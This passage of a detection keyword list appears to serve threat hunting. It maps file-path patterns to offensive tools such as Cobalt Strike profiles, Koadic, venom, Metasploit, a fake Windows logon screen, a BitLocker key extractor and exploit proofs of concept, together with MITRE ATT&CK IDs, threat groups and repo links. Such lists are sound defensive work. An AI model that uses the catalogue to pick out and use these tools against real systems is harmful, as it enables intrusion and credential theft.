TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/ExcelDocWriter.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/exchanger.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/exe_to_dll.git*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/exe_to_dll.git*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/exe2powershell*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*/exec_bin.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_dll.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_psexec*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/exec_psh.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_wmi*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/exec0.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/Executable_Files.git*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/exegol_user_sources.list*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/exegol-docker-build/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-history/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-images-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-images.git*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ExeStager/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/expl/expl.go*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,1,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z -*/exploit.cron.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/exploit.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit.ldpreload.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/exploit.pbj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/linux/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/remote/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/windows/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit_orw.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/exploits/*.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/exports_function_hid.txt*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*/ExternalC2/*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/ExternalC2/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/ExtractBitlockerKeys.git*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*/f5_bigip_tmui_rce.rb*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*/Fa1c0n35/zabbix-cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,1,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z -*/fake.html,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/FakeCmdLine*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/fakelogonscreen*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*/fake-sms.git*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*/Farmer.git*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*/fastfuz-chrome-ext*,offensive_tool_keyword,fastfuzz,Fast fuzzing websites with chrome extension,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/tismayil/fastfuz-chrome-ext,1,1,N/A,N/A,1,23,3,2022-02-04T02:15:51Z,2022-02-04T00:22:51Z -*/fb_firstlast.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/fb-brute.pl*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/fcrdns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/febinrev/dirtypipez-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/fern-wifi-cracker/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ffuf.git*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*/ffuf/ffufrc*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*/fiesta.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/fiesta2.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/FilelessPELoader*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*/final_shellcode_size.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/find_domain.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/FindModule.c*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*/FindObjects.cna*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 